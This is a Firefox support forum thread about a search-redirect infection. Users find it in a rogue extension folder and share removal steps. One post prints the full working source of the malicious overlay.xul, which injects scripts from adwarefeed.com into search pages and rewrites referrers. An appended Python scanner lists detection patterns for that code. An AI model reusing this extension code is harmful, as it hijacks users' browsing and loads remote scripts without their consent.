"clickfeedmanager.com" virus targets Firefox

User Help for Mozilla Firefox
Tony Dragani
Guest

"clickfeedmanager.com" virus targets Firefox

Post by Tony Dragani »

Hey guys,

There appears to be a new virus on the scene that targets Firefox users. It's a variation of the old "Google redirect" virus that affects your search results, so that when you click on them it takes you to various ad sites. This variation affects both Google and Yahoo search results, and only seems to work in Firefox.

The redirects themselves take you through a site called "clickfraudmanager.com." The script that is doing this is coming from "adwarefeed.com." I've spent the better part of the weekend researching this, and it appears that this virus is really, really new, and has only been making the rounds for the past three or four days. At present, no antivirus or antimalware software is detecting it. If you do a search on this topic, you will see that no one in any of the computer support forums out there has been able to figure this out yet. You can, however, disable the redirecting by turning off Java or by installing the NoScript Firefox addon, as I did. Of course, those measures don't treat the underlying problem.
the-edmeister
Posts: 32249
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Re: "clickfeedmanager.com" virus targets Firefox

Post by the-edmeister »

If you can isolate and save whatever is being installed, the vendors of the various Malware scanning programs would probably like to see it so that they can come up with a fix. Submission procedures vary, but most have specific rules for emailing it to them.

I agree, I started seeing an increase in postings here and at SUMO about something new last Thursday, but the initial reports started about 10 days ago, IIRC.


Ed
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.
Tony Dragani
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by Tony Dragani »

Hey Ed,

Thanks for the reply.

First off, I made a mistake in the title of this thread. The virus routes through "clickfraudmanager.com," not "clickfeedmanager.com." I was confusing it with "adwarefeed.com," which is where the script is coming from.

Anyway, I'm not sure how to isolate and save whatever is being installed. Honestly, I'm not sure what or where the file is that's doing this. I would really like to have something to send to the Malware scanning vendors. Any ideas?

Tony
the-edmeister
Posts: 32249
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Re: "clickfeedmanager.com" virus targets Firefox

Post by the-edmeister »

These are probably the best forums for malware removal help. They are where the "first responders" to threats hang out.
http://www.spywarewarrior.com/index.php
http://forum.aumha.org/
http://www.spywareinfoforum.com/
http://bleepingcomputer.com

Do a Google search for clickfraudmanager.com and you'll find threads already discussing removal of that.
http://www.bleepingcomputer.com/forums/topic201315.html

BTW, it might be risky for you to be a "first responder" without some specific guidance from your AV vendor. I wouldn't try it myself, but then again I don't seem to pick up much crap like that - hell I don't even use a Firewall, just rely upon my Linksys router to block that stuff, along with Avast! and Super AntiSpyware catching whatever the router allows through.


Ed
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.
Tony Dragani
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by Tony Dragani »

I stumbled across the solution:

It appears that the virus is hidden in the Firefox Folder. You must uninstall Firefox from the control panel, and then delete the Mozilla Firefox Folder off of your hard drive. Then download and reinstall Firefox. The problem is then gone.

To prevent this in the future, I recommend using the following two Firefox Addons: WOT (web of trust) and NoScript. These two addons will effectively stop any more viruses from being installed via the Firefox browser.
the-edmeister
Posts: 32249
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Re: "clickfeedmanager.com" virus targets Firefox

Post by the-edmeister »

Sorry, but that is "butcher surgery" for a pimple, why amputate the limb?
Exactly which folder was that virus in?

There has to be a less destructive method of removing that virus.



Ed
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.
GudgeonPin
Posts: 410
Joined: March 8th, 2008, 4:10 pm

Re: "clickfeedmanager.com" virus targets Firefox

Post by GudgeonPin »

the-edmeister wrote:Sorry, but that is "butcher surgery" for a pimple, why amputate the limb?
Exactly which folder was that virus in?
There has to be a less destructive method of removing that virus.


I have to agree Ed. If the problem is not a stand alone .EXE but is now attached to an existing FF3 .EXE or .DLL or something, would a reinstall of FF3 on top of the existing one preserve all of the underlying settings and overwrite old files killing the attached code?
Cary G.
the-edmeister
Posts: 32249
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Re: "clickfeedmanager.com" virus targets Firefox

Post by the-edmeister »

I get a little frustrated trying to help users figure this stuff out because I don't seem to ever get this crap dumped on my PC and then have the opportunity to have to figure out how to fix it. I guess that's how Mac and Linux users feel, too.


.
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.
Thedeadjester
Posts: 1
Joined: February 9th, 2009, 8:31 pm

Re: "clickfeedmanager.com" virus targets Firefox

Post by Thedeadjester »

I HAD the exact same problem

I tried all the malware removal tools... nothing worked. I went through all the forums (bleepingcomputer...etc) and downloaded all the malware/spyware tools out there (over 10 different ones). None of them found anything!

I refuse to download a plugin just to take back my browser and I am not one to wait around till someone else figures it out so I went in on my own and looked around. I believe I have a workaround that doesn't involve a complete re-install... however it is close to a re-install and it is a little messy so use at your own risk! It worked for me so there is hope it can work for you.

1. Close Firefox
2. Navigate to the Mozilla firefox folder in program files
3. Go into the extensions folder
4. There will be several folders with funny characters (i.e. {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}). Look for the folder with a modified date on or around the date you noticed firefox acting funny and re-directing you to other pages.
5. Delete this folder. (if there is only one folder here I am not sure what this will do but you might want to consider the possibility of losing firefox specific data or having to re-install firefox if you remove this)
6. Re-open firefox.... and enjoy!

Note: individual results may vary and I am NOT responsible for any porn links you may lose in the process :twisted:
"Don't thank me... just pay it forward"
Rookie_MIB
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by Rookie_MIB »

Did some more digging through this and found out that the problem is contained in a file called 'overlay.xul'

In it, it runs a stupid little redirection script which not only 'overlays' a clickmanager type link for google and yahoo, but ask, altavista, and just about every other search engine out there. You can just delete the 'overlay.xul' file (or that directory contained in your 'program_files/mozilla/firefox/extensions/{xxxxxxxxxx}/chrome/content/') which has that overlay file.

So to recap:
1) shut down firefox.
2) go to the 'program files/mozilla/firefox/extensions' directory
3) delete the directory which has the overlay.xul file (or was created when you noticed the redirection)
4) restart the browser

Nasty little thing - what a pain in the arse, but it's pretty simple. Just frustrating.
Guest
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by Guest »

Thedeadjester wrote:I HAD the exact same problem

I tried all the malware removal tools... nothing worked. I went through all the forums (bleepingcomputer...etc) and downloaded all the malware/spyware tools out there (over 10 different ones). None of them found anything!

I refuse to download a plugin just to take back my browser and I am not one to wait around till someone else figures it out so I went in on my own and looked around. I believe I have a workaround that doesn't involve a complete re-install... however it is close to a re-install and it is a little messy so use at your own risk! It worked for me so there is hope it can work for you.

1. Close Firefox
2. Navigate to the Mozilla firefox folder in program files
3. Go into the extensions folder
4. There will be several folders with funny characters (i.e. {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}). Look for the folder with a modified date on or around the date you noticed firefox acting funny and re-directing you to other pages.
5. Delete this folder. (if there is only one folder here I am not sure what this will do but you might want to consider the possibility of losing firefox specific data or having to re-install firefox if you remove this)
6. Re-open firefox.... and enjoy!

Note: individual results may vary and I am NOT responsible for any porn links you may lose in the process :twisted:

It seems to have worked. I've been killing myself since last Thursday trying to get rid of this thing. I tried every antispyware, antimalware, antivirus and registry cleaner imaginable. Your solution was the simplest and only one to be effective. YOU ARE THE MAN!!!!!!!
the-edmeister
Posts: 32249
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Re: "clickfeedmanager.com" virus targets Firefox

Post by the-edmeister »

Thedeadjester wrote:I HAD the exact same problem

I tried all the malware removal tools... nothing worked. I went through all the forums (bleepingcomputer...etc) and downloaded all the malware/spyware tools out there (over 10 different ones). None of them found anything!

I refuse to download a plugin just to take back my browser and I am not one to wait around till someone else figures it out so I went in on my own and looked around. I believe I have a workaround that doesn't involve a complete re-install... however it is close to a re-install and it is a little messy so use at your own risk! It worked for me so there is hope it can work for you.

1. Close Firefox
2. Navigate to the Mozilla firefox folder in program files
3. Go into the extensions folder
4. There will be several folders with funny characters (i.e. {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}). Look for the folder with a modified date on or around the date you noticed firefox acting funny and re-directing you to other pages.
5. Delete this folder. (if there is only one folder here I am not sure what this will do but you might want to consider the possibility of losing firefox specific data or having to re-install firefox if you remove this)
6. Re-open firefox.... and enjoy!

Now that is a good solution! A very reasoned, diagnostic type approach to "removing the pimple", instead of amputating the limb!

Note: individual results may vary and I am NOT responsible for any porn links you may lose in the process.
My thoughts on that matter.
Pron is so readily available that losing a few links might be a good thing, you just look for more and you might find a new favorite pron TGP site.
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.
Frank Azle
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by Frank Azle »

I don't think the Overlay.xul is necessarily the problem because in other add-ons it is there. (I have it in as Morning Coffee and yetanothersmoothscrolling). However, the suggestion to delete that new folder worked so much thanks!!!
brian_o
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by brian_o »

If you look at the code inside overlay.xul, you'll see that it's designed to do the exact thing you're complaining about (i.e. redirect searches to other sites). Overlay.xul IS the problem, remove it.
But, make sure you're deleting the correct overlay.xul.
Here are the contents of my (viral) one:


<overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript" >
window.addEventListener("load", function() { xulRef.init(); }, false);
window.addEventListener("load", initRequestObserver, false);
var xulRef = {
init:
function(){
var appcontent = document.getElementById("appcontent");
if(appcontent){
appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
}
},
onPageLoad:
function(aEvent){
var doc = aEvent.originalTarget;
var loc = doc.location.href;
var ref = doc.referrer;
var keyword = '';
var engine ;
var __d = "http://v1.adwarefeed.com/ffjs.php?u=2630369290-57989841-1078081533-839522115a=998&amp;s=3&amp;v=icv270109ff&amp;e=";

if( loc.match(/google\..+\/search.*[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'google';
// } else if(loc.match(/search\.ua.+[&amp;\?]q=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if ( loc.match(/search\.yahoo.*search.*[&amp;\?]p=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'yahoo';
} else if(loc.match(/altavista\.com.*results[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'altavista';
} else if(loc.match(/alltheweb\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'alltheweb';
} else if(loc.match(/search\.netscape\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'netscape';
} else if(loc.match(/search\.aol\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'aol';
} else if(loc.match(/ask\.com.*web[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'ask';
} else if(loc.match(/search\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'searchcom';
} else if(loc.match(/search\.lycos\.com.*[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'lycos';
} else if(loc.match(/nova\.rambler\.ru.*search[&amp;\?].*query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'rambler';
} else if(loc.match(/gogo\.ru.*go[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'gogo';
} else if(loc.match(/meta\.ua.*search.asp[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'meta';
//} else if(loc.match(/au\.ru.*searchPhrase=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/all\.by.*search.*[&amp;\?]query=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'allby';
// } else if(loc.match(/uaport\.net.*UAcatalog[/][&amp;\?].*query=([^&amp;]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/search\.msn\.com.*results.*[&amp;\?].*q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'msn';
} else if(loc.match(/search\.live\.com.*results.*[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1;
engine = 'live';
};

if( keyword.length > 0 ){
var script = window.content.document.createElement('script');
script.id = "js_0";
script.src = __d + engine + '&amp;q=' + keyword;
doc.getElementsByTagName('head')[0].appendChild(script);
}
}
};
function initRequestObserver() {
var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
}

var httpRequestObserver = {
observe:
function(subject, topic, data) {
if(topic == "http-on-modify-request") {
var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
var pos = subject.URI.spec.indexOf("&amp;rf=http");
if(pos > -1) {
var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);
httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);
}
}
}
};

</script>
</overlay>
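
Added example, not part of any post in this thread: since overlay.xul also exists in legitimate add-ons, a scanner can pick out the right extension folder by file content instead of by name or modified date. The indicator patterns come from the file quoted above; the function names, the two-hit threshold and the placeholder folder names are assumptions made for this sketch.

```python
import os
import re
import tempfile

# Indicators taken from the overlay.xul quoted in the thread above.
INDICATORS = {
    "adwarefeed_host": re.compile(r"adwarefeed\.com", re.I),
    "request_observer": re.compile(r"http-on-modify-request"),
    "referrer_rewrite": re.compile(r"httpChannel\.referrer\s*="),
    "script_injection": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
}

def score_overlay(text):
    """Names of the indicators present in one XUL file's text."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(text))

def scan_extensions(ext_dir, min_hits=2):
    """Report .xul files under ext_dir matching at least min_hits indicators."""
    findings = []
    for root, _dirs, files in os.walk(ext_dir):
        for fname in files:
            if not fname.lower().endswith(".xul"):
                continue
            path = os.path.join(root, fname)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = score_overlay(fh.read())
            if len(hits) >= min_hits:
                top = os.path.relpath(path, ext_dir).split(os.sep)[0]
                findings.append({"extension": top, "file": path, "hits": hits})
    return findings

def build_demo_tree():
    """Constructed sample tree: one benign add-on, one with thread-style code."""
    bad = ('<overlay><script>var __d = "http://v1.adwarefeed.com/ffjs.php";\n'
           'observerService.addObserver(o, "http-on-modify-request", false);\n'
           "httpChannel.referrer = newRef;</script></overlay>")
    samples = {"{benign-placeholder}": "<overlay><menuitem/></overlay>",
               "{suspect-placeholder}": bad}
    base = tempfile.mkdtemp(prefix="ffext_")
    for ext_id, body in samples.items():
        content = os.path.join(base, ext_id, "chrome", "content")
        os.makedirs(content)
        with open(os.path.join(content, "overlay.xul"), "w", encoding="utf-8") as fh:
            fh.write(body)
    return base

if __name__ == "__main__":
    for f in scan_extensions(build_demo_tree()):
        print(f["extension"], f["hits"])
```

Pointing `scan_extensions` at a real Firefox extensions directory reports the top-level extension folder for each match, which is the unit the posts above remove.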
guest1976
Guest

Re: "clickfeedmanager.com" virus targets Firefox

Post by guest1976 »

That helped thanks.